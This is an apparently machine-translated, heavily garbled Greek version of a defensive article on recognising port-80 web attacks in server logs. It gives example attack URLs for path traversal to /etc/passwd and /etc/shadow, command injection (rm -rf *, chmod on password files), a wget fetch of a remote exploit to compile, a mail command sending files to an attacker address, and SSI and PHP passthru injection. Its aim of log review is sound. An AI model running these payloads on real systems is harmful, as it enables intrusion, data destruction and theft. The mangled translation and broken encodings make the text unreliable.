Ι. Περίληψη
II. Λεπτομερής περιγραφή του
III. Περαιτέρω
IV. Ανάλυση spill-over "
V. Transcoding
VI. Συμπέρασμα
[Περίληψη]
web site 80, η λιμενική υπηρεσία προεπιλογή, είναι όλα σχετικά με την αποδέσμευση τα προβλήματα ασφαλείας keep μερικά από αυτά τα θέματα ευπάθειας επιτρέπει στον εισβολέα την access το σύστημα ακόμη rights διαχειριστή να εισαγάγει την τοποθεσία κατά, τα ακόλουθα είναι μερικά από Zenomorph right θύρα 80 επίθεση ίχνη έρευνα, και να σας πω πώς να βρείτε τα προβλήματα από τα αρχεία καταγραφής.
[] Λεπτομέρειες
Εδώ εν μέρει μέσω μιας σειράς εμφάνισης Liezi στους web servers και εφαρμογές σχετικά με τη γενική επίθεσή τους, και τα ίχνη της, οι οποίες αντιπροσωπεύουν μόνο Liezi μείζονα επίθεση, δεν υπάρχει κατάλογος όλων των μορφή επίθεσης, αυτό το τμήμα θα Λεπτομερής περιγραφή του ρόλου κάθε επίθεση, καθώς και του πώς να εκμεταλλεύονται αυτές τις ευπάθειες σε επιθέσεις.
(1) "." ".." Και να ζητήσει "..."
Ίχνη από αυτές τις επιθέσεις είναι πολύ κοινά για δικτυακές εφαρμογές και web server, τα οποία χρησιμοποιούνται να επιτρέψει σε έναν εισβολέα ή worm-virus πρόγραμμα για την αλλαγή πορείας του διακομιστή Web, για να αποκτήσουν πρόσβαση σε κλειστές ζώνες. Τα περισσότερα προγράμματα CGI με αυτά τα ελαττώματα, ".." αίτημα.
Παράδειγμα:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Αυτό δείχνει ο εισβολέας Liezi αίτημα mosd αυτού του αρχείου, αν ο εισβολέας η σημαντική ανακάλυψη δυνατότητα web server ριζικό κατάλογο, στη συνέχεια, να πάρετε περισσότερες πληροφορίες και για να αποκτηθούν περαιτέρω προνόμια.
(2) "20%" αίτημα
20% είναι το εξάγωνο αξία ότι οι 16 θέσεις, αν και αυτό δεν σημαίνει ότι έχει can χρησιμοποιήσει κάτι, but όταν προβάλετε το αρχείο καταγραφής will it βρει, κάποια εφαρμογή διακομιστή web τρέχει on αυτό χαρακτήρα μπορούν be effectively εφαρμοστεί Ως εκ τούτου, θα πρέπει να εξετάσουν προσεκτικά το ημερολόγιο. Από την άλλη πλευρά, η αίτηση μπορεί μερικές φορές να βοηθήσουν να εκτελέσει κάποιες εντολές.
Παράδειγμα:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Αυτό δείχνει Liezi εισβολέα να εκτελέσει ένα unix εντολή, απαριθμώντας το σύνολο του καταλόγου των εγγράφων που ζητήθηκαν, με αποτέλεσμα ο εισβολέας να έχουν πρόσβαση σε σημαντικά αρχεία στο σύστημά σας, για να τον βοηθήσει να παρέχει τις προϋποθέσεις για την απόκτηση των προνομίων.
(3) "% 00" αίτηση
00% είπε ότι το 16-byte δεκαεξαδικό άδειο, κατάφερε να ξεγελάσει την web εφαρμογή, και να ζητούν διαφορετικούς τύπους αρχείων.
Παραδείγματα:
http://host/cgi-bin/lame.cgi?page=index.html
Αυτό μπορεί να είναι μια έγκυρη αίτηση κατά το μηχάνημα, αν ένας επιτιθέμενος γνωρίζει το αίτημα αυτό στέφθηκε με επιτυχία, θα εξετάσει περαιτέρω την cgi διαδικασίες.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Ίσως το cgi πρόγραμμα δεν δέχεται το αίτημα αυτό, διότι είναι το αίτημα να ελέγξετε το αρχείο επίθημα όνομα, όπως: html.shtml ή άλλους τύπους αρχείων. Τα περισσότερα προγράμματα θα σας πω το ζητήσει τύπο αρχείου είναι άκυρο, αυτή τη φορά θα πει τα αιτήματα εισβολέας το αρχείο πρέπει να είναι ένας χαρακτήρας ενός αρχείου κατάληξη τύπου, έτσι ώστε ένας εισβολέας μπορεί να πάρει το δρόμο του συστήματος, το όνομα του αρχείου, με αποτέλεσμα να το σύστημά σας πιο ευαίσθητες πληροφορίες
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd 00html%
Προσοχή σε αυτό το αίτημα, θα εξαπατήσει cgi πρόγραμμα ότι το έγγραφο αυτό είναι ο καθορισμός των αποδεκτών τους τύπους αρχείων, κάποιες εφαρμογές αποτελεσματικών ελέγχων ως ηλίθιο αρχείο αίτημα, το οποίο χρησιμοποιείται συνήθως μεθόδους του εισβολέα.
(4) "|" αίτημα
Πρόκειται για έναν χαρακτήρα σωλήνα, στο unix σύστημα, ένα αίτημα για βοήθεια στην εφαρμογή των διαφόρων εντολές του συστήματος ταυτόχρονα.
Παράδειγμα:
# Cat access_log | grep-i ".."
(Αυτή η εντολή θα εμφανίσει το ημερολόγιο στο ".." αίτημα, που χρησιμοποιούνται συνήθως για τις επιθέσεις και τα σκουλήκια που βρέθηκαν)
Συχνά διαπιστώνουμε ότι πολλές διαδικτυακές εφαρμογές χρησιμοποιούν αυτόν τον χαρακτήρα, αυτό οδηγεί επίσης σε ψευδείς συναγερμούς στην IDS κορμών.
Κατά την προσεκτική εξέταση της αίτησής σας, έτσι το πλεονέκτημα της μείωσης εσφαλμένων συναγερμών σε συστήματα ανίχνευσης εισβολής.
Εδώ είναι μερικά από Lieh-Tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Αυτή η εντολή αίτημα, οι ακόλουθες είναι ορισμένες αλλαγές στην Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Αυτό το αίτημα είναι εισηγμένη στο unix σύστημα κατάλογο / etc όλων των αρχείων
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Η εφαρμογή της γάτας αιτήματος και grep εντολών θα τεθούν σε εφαρμογή, ελέγξτε το "κουτσό"
(5) "?" Αίτημα
Σε συστήματα Unix, αυτό το χαρακτήρα επιτρέπει πολλαπλές εκτέλεση της γραμμής εντολών
Παράδειγμα:
# Id? Uname-a
(Εφαρμογή της id εντολή, ακολουθούμενη από την εφαρμογή της εντολής uname)
Μερικά πρόγραμμα web με αυτόν τον χαρακτήρα, μπορεί να οδηγήσει σε IDS σας κορμοί προειδοποίηση αποτυχίας, θα πρέπει να ελέγξετε προσεκτικά το πρόγραμμα Ιστού σας, έτσι ώστε να μειωθεί ο κίνδυνος της αποτυχίας του IDS καταχωρήσεων.
(6) " " και " " Αίτημα
Πρέπει να ελέγξετε logs σας καταγράφει τους δύο χαρακτήρες, μια σειρά από λόγους, το πρώτο είναι ο χαρακτήρας ότι τα στοιχεία που προστέθηκαν στο έγγραφο
Παράδειγμα 1:
# Echo "hax0red σας h0 h0" / etc / motd (motd ζητήσει γραπτές πληροφορίες στο παρόν έγγραφο)
Ένας εισβολέας μπορεί να χρησιμοποιήσει εύκολα την αίτηση κατά τα ανωτέρω παρέμβαση ιστοσελίδα σας. Όπως το περίφημο RDS εκμεταλλευτεί ο εισβολέας χρησιμοποιείται συχνά για να αλλάξετε την ιστοσελίδα.
Παράδειγμα 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html θα παρατηρήσετε ότι η γλώσσα των σημάτων εδώ, πέρασε επίσης χαρακτήρες " "," ", αυτές οι επιθέσεις δεν μπορεί να προκαλέσει εισβολέα να αποκτήσει πρόσβαση στο σύστημα, σύγχυση άνθρωποι σκέφτονται αυτό είναι ένα νόμιμο πληροφοριών ιστοσελίδα (που οδηγεί σε Οι άνθρωποι επισκεφθείτε το σύνδεσμο για να επισκεφθείτε τον επιτιθέμενο να ορίσετε τη διεύθυνση, το αίτημα αυτό μπορεί να είναι κωδικοποιημένο σε μια μορφή δεκαεξαδικό 16 χαρακτήρων, έτσι ώστε τα ίχνη της επίθεσης δεν είναι τόσο προφανής)
(7) "!" Αίτηση
Κοινή γλώσσα για το χαρακτήρα αίτημα SS (Server Side Συμπεριλάβετε) I επίθεση, αν ο εισβολέας είναι ένας εισβολέας συγχέουν ο χρήστης κάνει κλικ στο σύνδεσμο που και η ίδια όπως παραπάνω.
Παράδειγμα:
http://host1/something.php =
Η Lieh-Tzu είναι ο εισβολέας μπορεί να το κάνει σε ένα αρχείο στην τοποθεσία host2 από host1 φαίνεται παραπάνω (φυσικά, να απαιτήσει τους επισκέπτες να επισκεφθούν τις ρυθμίσεις σύνδεσης του εισβολέα. Η αίτηση αυτή μπορεί να μετατραπεί σε 16 hex μάσκα κωδικοποίηση, δεν είναι εύκολο να βρεθεί)
Ταυτόχρονα, η προσέγγιση αυτή μπορεί επίσης να διενεργεί την αρχή εντολή ιστοσελίδα
Παράδειγμα:
http://host/something.php =
Η Lieh-run για το απομακρυσμένο σύστημα "id" εντολή, θα εμφανίζει ταυτότητα του χρήστη ιστοσελίδα, είναι συνήθως "κανείς δεν" ή "www"
Αυτή η φόρμα επιτρέπει επίσης τη συμπεριλαμβανόμενη κρυμμένα αρχεία.
Παράδειγμα:
http://host/something.php =
Τα κρυμμένα αρχεία. Htpasswd δεν θα εμφανιστεί, Apache θα αρνηθεί να διαπιστώσει κανόνων αυτών. Ht το έντυπο αίτησης, και SSI λογότυπο θα παρακάμψουν τέτοιους περιορισμούς, και να οδηγήσει σε προβλήματα ασφαλείας
(8) "," Αίτηση
Οι επιθέσεις αυτές που χρησιμοποιούνται για να προσπαθήσει για την απομακρυσμένη εισαγάγετε ένα PHP διαδικασίες web εφαρμογή, it μπορεί να επιτρέψει τη σειρά εκτέλεσης, ανάλογα με την ρυθμίσεις του διακομιστή και άλλους παράγοντες στην εργασία (όπως η php είναι set σε safe mode)
Παράδειγμα: http://host/something.php = passthru ("id ");?
Σε ορισμένα από απλή αίτηση php, μπορεί να είναι η ιστοσελίδα του απομακρυσμένου δικαιώματα του χρήστη του συστήματος να εκτελεί την τοπική διοίκηση
(9) "» "αίτημα
Ο χαρακτήρας αυτός αργότερα χρησιμοποιήθηκε για την εκτέλεση εντολών σε perl, οι χαρακτήρες στο web εφαρμογή δεν είναι συχνά χρησιμοποιείται, έτσι ώστε αν το βλέπετε στο ημερολόγιο σας, θα πρέπει να είναι πολύ προσεκτικοί
Παράδειγμα:
http://host/something.cgi = `id`
Γράψτε ένα perl cgi εν λόγω πρόγραμμα θα οδηγήσει στην υλοποίηση της εντολής id
[Περαιτέρω]
Τμήμα που ακολουθεί θα συζητήσει την εφαρμογή των more επιθέσεις μπορούν εντολή, μαζί με τα έγγραφα που ζητήθηκαν, and εάν έχετε ένα remote ελάττωμα εκτέλεση εντολών, θα πρέπει να τον τρόπο ελέγχου της ανακάλυψης. Αυτό το μέρος είναι μόνο για να σας δώσει μια καλή ιδέα, και πείτε το σύστημά σας τι συμβαίνει, οι εισβολείς προσπαθούν να επιτεθούν ίχνη του συστήματός σας, αλλά δεν τον κατάλογο όλων των εισβολέα να χρησιμοποιήσει τις εντολές και τα αιτήματα.
"/ Bin / ls"
Αυτό ζητά εντολή ολόκληρη τη διαδρομή, σε πολλές εφαρμογές web έχουν αυτό το κενό, εάν συνδεθείτε σε πολλά μέρη τέτοιο αίτημα, είναι δυνατό για τους μεγάλους απομακρυσμένη ευπάθεια εντολή εκτέλεσης, αλλά δεν είναι απαραίτητα ένα πρόβλημα Μπορεί επίσης να είναι μια ψευδή συναγερμό. Για άλλη μια φορά υπενθύμισε, διαδικτυακή εφαρμογή γραπτές (cgi, asp, php ... κλπ) είναι η βάση της ασφάλειας
Παράδειγμα:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al?
"Cmd.exe"
Αυτό είναι ένα παράθυρα του περιβλήματος, εάν ένας εισβολέας να αποκτήσετε πρόσβαση και να εκτελέσετε αυτό το script στον ρυθμίσεις διακομιστή, υπό τους όρους που επιτρέπεται στη μηχανή παραθύρων μπορεί να κάνει τίποτε, πολλοί σκουλήκια είναι μέσω της θύρας 80, ανακοίνωση προς το απομακρυσμένο μηχάνημα
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Αυτό είναι ένα δύο δυαδικά αρχεία, τα προβλήματά της και / bin / ls, όπως και, εάν συνδεθείτε σε πολλά μέρη τέτοιο αίτημα, είναι δυνατό για τους μεγάλους απομακρυσμένη ευπάθεια εντολή εκτέλεσης, αλλά δεν είναι απαραίτητα ένα πρόβλημα Μπορεί επίσης να είναι μια ψευδή συναγερμό.
Θα δείξει ποιο τμήμα ανήκει σε ποια ομάδα χρηστών και
Παράδειγμα:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id?
"/ Bin / rm"
Αυτή η εντολή μπορεί να διαγράψει τα αρχεία χωρίς τη σωστή χρήση είναι πολύ επικίνδυνο
Παραδείγματα:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf 20% * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *?
"Wget και TFTP" εντολή
Οι εντολές αυτές είναι συχνά ο εισβολέας μπορεί να αποκτήσει επιπλέον προνόμια για να κατεβάσετε αρχεία, το wget είναι ένα unix εντολή στο πλαίσιο, μπορεί να χρησιμοποιηθεί για να κατεβάσετε backdoors, tftp τελεί υπό την εντολή unix και nt, χρησιμοποιείται για να κατεβάσετε το αρχείο. Μερικά σκουλήκια IIS διαδίδονται με TFTP για την αντιγραφή του ιού σε άλλους ξενιστές
Παραδείγματα:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget 20http%: / / host2/Phantasmp.c | http:// υποδοχής / cgi-bin / bad.cgi; DOH = 20http% wget: / / www.hwa-security.net/Phantasmp.c?
"Cat" εντολή
Αυτή η εντολή χρησιμοποιείται για να δείτε τα περιεχόμενα του the αρχείο, που χρησιμοποιείται για να διαβάσετε τις σημαντικές πληροφορίες, όπως αρχεία ρυθμίσεων, τα αρχεία τον κωδικό πρόσβασης, τα αρχεία τα πιστωτικά ιδρύματα και τα έγγραφα που μπορείτε να σκεφτείτε of
Παραδείγματα:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi; DOH =% γάτα 20/etc/motd?
"Echo" εντολή
Αυτή η εντολή χρησιμοποιείται για να γράψει τα δεδομένα στο αρχείο, όπως το "index.html"
Παραδείγματα: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# ακτινίδια% 20was% 20here"% 20 | 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# ακτινίδια% 20was% 20here"% 20 % 200day.txt?
«Ps» εντολή
Παραθέτει την τρέχουσα διαδικασία λειτουργίας, πείτε ότι ο εισβολέας έναν απομακρυσμένο υπολογιστή που τρέχει το λογισμικό για να πάρετε μια ιδέα για τα θέματα ασφάλειας, για να λάβει περισσότερες άδειες
Παραδείγματα: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH =% ps 20-aux?
"Kill και killall" command
Unix συστήματα για να σκοτώσει τη διαδικασία αυτή, ένας εισβολέας μπορεί να χρησιμοποιήσει αυτή την εντολή για να σταματήσει τις υπηρεσίες του συστήματος και των διαδικασιών μπορεί να διαγράψει επίσης τα ίχνη του επιτιθέμενου, ορισμένοι εκμεταλλεύονται θα παραγάγει πολλές διεργασίες του παιδιού
Παραδείγματα:% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% | http://host/cgi-bin/bad.cgi?doh=kill 20 -9% 200?
"Uname" εντολή
Αυτή η εντολή λέει ο εισβολέας όνομα του απομακρυσμένου μηχανήματος, για κάποιο χρονικό διάστημα, μέσω αυτής της ιστοσελίδας, ώστε να γνωρίζουν ποια isp, ένας εισβολέας που μπορεί να επισκεφθεί σήμερα. Uname-a για να ζητήσει κανονικά, θα καταγράφονται στο αρχείο καταγραφής
Παραδείγματα:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname 20-a | http://host/cgi-bin/bad. cgi? DOH =% uname 20-ένα?
"Κοιν., gcc, perl, python, κτλ ..." συγκέντρωση / ερμηνεία της εντολής
Εισβολέας μέσω wget ή tftp download εκμεταλλεύονται και χρησιμοποιούν το cc, gcc compiler για τη συγκέντρωση αυτή σε ένα εκτελέσιμο πρόγραμμα, καθώς και περαιτέρω δικαιώματα πρόσβασης
Παραδείγματα: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c?. / a.out% 20-p% 2031337?
Εάν προβάλετε τα αρχεία καταγραφής που βρέθηκαν στο "perl" python "Οι οδηγίες αυτές μπορεί να είναι ένα απομακρυσμένο επιτιθέμενο να κατεβάσετε perl, python script, και προσπάθησαν να πάρουν τα προνόμια των τοπικών
"Mail" εντολή
Οι επιτιθέμενοι συχνά χρησιμοποιούν αυτό το σύστημα διοίκησης, ορισμένα σημαντικά έγγραφα με τις δικές γραμματοκιβώτιο του εισβολέα, αλλά και πρόθυμοι να e-mail είναι βομβιστικών επιθέσεων διεξάγονται
Παραδείγματα:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20
2.168.22.1?
"Chown, chmod, chgrp, chsh, κ.λπ. ..." και άλλες εντολές
Unix συστήματα, προκειμένου να τους επιτρέψει να αλλάξετε τις άδειες αρχείων
chown = επιτρέπει τον καθορισμό του κυρίου αρχείου chmod = επιτρέπει να ρυθμίσετε το αρχείο chgrp δικαιώματα = επιτρέπει στον ιδιοκτήτη να αλλάξετε τα δικαιώματα της ομάδας για τα αρχεία chsh = επιτρέπεται να αλλάξετε το φλοιό του χρήστη
Παραδείγματα: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi; DOH = chmod% 20777% 20index.html? http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh? http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin /% chgrp 20nobody% | 20/etc/shadow
"/ Etc / passwd" αρχείο
Αυτό είναι το αρχείο κωδικό πρόσβασης του συστήματος, συνήθως σκιά μακριά, και δεν επιτρέπει να δει το κρυπτογραφημένο κωδικό πρόσβασης, αλλά σε έναν εισβολέα που μπορεί να ξέρει τι είναι έγκυρο χρήστη, και η απόλυτη διαδρομή του συστήματος, το όνομα της ιστοσελίδας καθώς και άλλες πληροφορίες, όπως συμβαίνει συνήθως από την σκιά off, ώστε ο εισβολέας θα δει κανονικά αρχείο / etc / σκιά
"/ Etc / master.passwd"
Αυτό το αρχείο είναι το σύστημα BSD κωδικό πρόσβασης του αρχείου, περιέχει το κρυπτογραφημένο κωδικό πρόσβασης, το αρχείο του λογαριασμού root είναι μόνο για ανάγνωση μόνο, και μερικές ανειδίκευτοι επιτιθέμενοι άνοιξαν την προσπάθειά του να διαβάσει το περιεχόμενο στο εσωτερικό του., Αν η ιστοσελίδα είναι προνόμια root για να τρέξει, τότε ο επιτιθέμενος είναι, μπορούμε να διαβάσουμε τα περιεχόμενα, μέσα σε πολλά προβλήματα σχετικά με τον διαχειριστή του συστήματος θα διαδέχονται το ένα το άλλο
"/ Etc / σκιά"
Περιέχει έναν κωδικό πρόσβασης κρυπτογραφημένο σύστημα, διαβάστε το ίδιο για τον χρήστη root, και / et / master.passwd σχεδόν
"/ Etc / motd"
Όταν οι χρήστες να συνδεθείτε στο unix σύστημα, οι πληροφορίες που εμφανίζεται, στο "Μήνυμα της Ημέρας" αρχείο, παρέχει σημαντικές πληροφορίες του συστήματος και διαχειριστής των χρηστών του κάποιο σύνολο, τους χρήστες που θέλουν να δουν εκείνους που δεν είναι, Επίσης, περιέχει τις πληροφορίες έκδοσης του συστήματος, ο εισβολέας θα δείτε συνήθως αυτό το αρχείο, για να καταλάβουν τι το σύστημα λειτουργεί με τον εισβολέα, το επόμενο βήμα είναι να ψάξει για αυτό το είδος του συστήματος, αξιοποίηση και περαιτέρω πρόσβαση στο σύστημα των προνομίων
"/ Etc / hosts"
Το έγγραφο παρέχει τη διεύθυνση IP και του δικτύου πληροφοριών, ένας εισβολέας μπορεί να μάθετε περισσότερα σχετικά με τις ρυθμίσεις δικτύου του συστήματος
"/ Usr / local / apache / conf / httpd.conf"
Αυτό είναι ένα web server Apache αρχείο ρυθμίσεων, ένας εισβολέας μπορεί να καταλάβει, όπως CGI, SSI και άλλες πληροφορίες είναι προσβάσιμες
"/ Etc / inetd.conf"
Αυτό είναι το αρχείο ρυθμίσεων inetd υπηρεσία, ένας εισβολέας μπορεί να μάθει το απομακρυσμένο υπολογιστή, ξεκινήστε τις υπηρεσίες αυτές, εάν θέλετε να χρησιμοποιήσετε το περιτύλιγμα για τον έλεγχο της πρόσβασης, εάν το περιτύλιγμα βρέθηκε τρέξιμο, ένας εισβολέας το επόμενο βήμα θα ελέγξει "/ etc / hosts.allow" και "/ etc / hosts.deny", το αρχείο, και το οποίο μπορεί να αλλάξει κάποιες ρυθμίσεις, προνόμια πρόσβασης
". Htpasswd,. Htaccess, και. Htgroup"
Τα αρχεία αυτά χρησιμοποιούνται συνήθως σε έλεγχο ταυτότητας χρήστη ιστοσελίδα, ο εισβολέας θα δείτε αυτά τα αρχεία, και να πάρει το όνομα χρήστη και τον κωδικό πρόσβασης, το αρχείο κωδικού πρόσβασης. htpasswd κρυπτογραφούνται πριν, το διάλειμμα μέσα από κάποια απλή διαδικασία αποκρυπτογράφησης, επιτρέπει στον εισβολέα την πρόσβαση στον τόπο, προστατευόμενες περιοχές (συνήθως ο χρήστης να χρησιμοποιεί το ίδιο κωδικό πρόσβασης και όνομα χρήστη, καθώς επίσης και ο εισβολέας μπορεί να επισκεφθεί τον άλλο λογαριασμό)
"Access_log και error_log"
Αυτά είναι τα αρχεία καταγραφής apache server, οι εισβολείς δείτε συχνά αυτά τα αρχεία, θα εξετάσει τα αιτήματα αυτά καταγράφονται, αυτά και άλλα αιτήματα για διαφορετικούς τόπους
Τυπικά, ο εισβολέας θα τροποποιήσουν αυτά τα αρχεία καταγραφής, όπως το δικό πληροφορίες διεύθυνσή του, ο εισβολέας, μέσω της θύρα 80, μέσω του συστήματός σας και δημιουργίας αντιγράφων ασφαλείας του συστήματός σας, επίσης, δεν λειτουργεί, δεν υπάρχει άλλο πρόγραμμα ρεκόρ καταγράφει την κατάσταση του συστήματος, το οποίο θα ανίχνευση παρείσφρησης γίνεται πολύ δύσκολο να εργαστεί
«[] Drive-γράμματα: winntrepairsam._ ή [γράμμα μονάδας δίσκου]: winntrepairsam"
Τα Windows NT σύστημα αρχείων κωδικό, αν το απομακρυσμένο εντολή δεν μπορεί να υλοποιηθεί, οι εισβολείς θα ζητήσει συνήθως τα έγγραφα αυτά, τότε "L0pht ρωγμή» του τύπου των κωδικός κροτίδα εργαλεία για να σπάσει, αν ο εισβολέας προσπαθεί να επιτεθεί το αρχείο κωδικό πρόσβασης του διαχειριστή, εάν επιτυχής τότε το απομακρυσμένο μηχάνημα θα είναι ο εισβολέας παίρνει τον έλεγχο
[] Υπερχείλιση ανάλυση
Σε αυτό το άρθρο δεν θα πω πάρα πολλά για την υπερχείλιση του θέματος, θα δώσω ό, τι αυτά φαινόμενα και τα ίχνη των αξιόλογες και προκαλούν ιδιαίτερη ανησυχία, οι επιθέσεις buffer είναι μερικές φορές ο επιτιθέμενος με την επανακωδικοποίηση και δεν είναι εύκολο να βρει άλλους τρόπους για να επιτευχθεί
Εδώ είναι ένα απλό ψέμα Zi
Παράδειγμα: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Αυτό Liezi δείχνει ο εισβολέας σχετικά με αίτηση για να στείλετε ένα πολύ Ένας χαρακτήρας, η δοκιμή του προγράμματος υπερχείλιση του buffer, υπερχείλιση μνήμης που μπορούν να πάρουν μια δικαιώματα απομακρυσμένης υποδοχής εντολή εκτέλεσης, εφόσον ο ιδιοκτήτης έχει την setuid και τις διαδικασίες για τη ρίζα, μέσα από την υπερχείλιση, μπορούν να έχουν πρόσβαση σε όλο το σύστημα, αν δεν ήθελε setuid πρόγραμμα, τότε η υπερχείλιση είναι μόνο από τη λειτουργία των χρηστών του Δικτύου των δικαιωμάτων
Εδώ δεν μπορούμε να πούμε όλες τις περιστάσεις, αλλά θα πρέπει να ελέγχετε τακτικά το αρχείο καταγραφής σας, εάν η ημέρα που βρέθηκαν ξαφνικά πολλά αιτήματα, αλλά όχι συνήθως περισσότερο από την αίτηση, σημαίνει ότι υπόκεινται σε επιθέσεις υπερχείλιση, φυσικά, μπορεί επίσης να Μια νέα επίθεση worm δικτύου
[Transcoding]
Όλες οι επιθέσεις αναφέρθηκε παραπάνω αίτημα, ο επιτιθέμενος γνωρίζει συνήθως IDS συστημάτων συχνά μηχανικές αίτημα ελέγχου, συνήθως ο εισβολέας θα κωδικοποιηθεί από το εργαλείο μετατροπής θα ζητήσει από το περιεχόμενο Zhuanhua σε μορφή 16-band, Daozhi IDS αγνοεί το αίτημα, Είμαστε εξοικειωμένοι με την ευπάθεια CGI συσκευή σάρωσης που είναι μια καλή Liezi Whisker. Εάν προβάλετε το αρχείο καταγραφής του χρόνου διαπιστώθηκε ένας μεγάλος αριθμός 16-ζώνης και όχι κάποια κοινά στοιχεία, τότε ο εισβολέας μπορεί να προσπαθήσει να χρησιμοποιήσει ορισμένους από τους τρόπους για να επιτεθεί το σύστημά σας
Ένας γρήγορος τρόπος είναι το αρχείο καταγραφής από αίτημα αυτών των hex 16, αντιγράψτε το στο browser σας από το πρόγραμμα περιήγησης μπορεί να μετατραπεί σε δικαίωμα να ζητήσει, και εμφανίζεται το περιεχόμενο της αίτησης, αν δεν θάρρος να αναλάβει αυτόν τον κίνδυνο, ένας απλός άνθρωπος ASCII, μπορεί να σας παρέχει το σωστό κωδικό.
[] Συμπέρασμα
Αυτό το άρθρο δεν να καλύψουν όλες τις 80 λιμάνια της επίθεσης, αλλά οι περισσότερες είναι πράξεις περισσότερο από ό, τι ο general επίθεση, and you how πει να ελέγξετε files ημερολογίου σας, και πώς η increase και μια σειρά IDS rules, γράφοντας objective της είναι να web διαχειριστής του συστήματος πρέπει να ανησυχούμε για το τι είναι μια καλή ιδέα την ίδια στιγμή, ελπίζω αυτό το άρθρο βοηθάει σε web developers web πρόγραμμα για να γράψει καλύτερα προγράμματα
ΤΟΥ ΣΗΜΕΙΩΣΗ: Αν έχετε οποιαδήποτε σχόλια και υποδείξεις, παρακαλούμε στείλτε ένα e-mail admin@cgisecurity.com.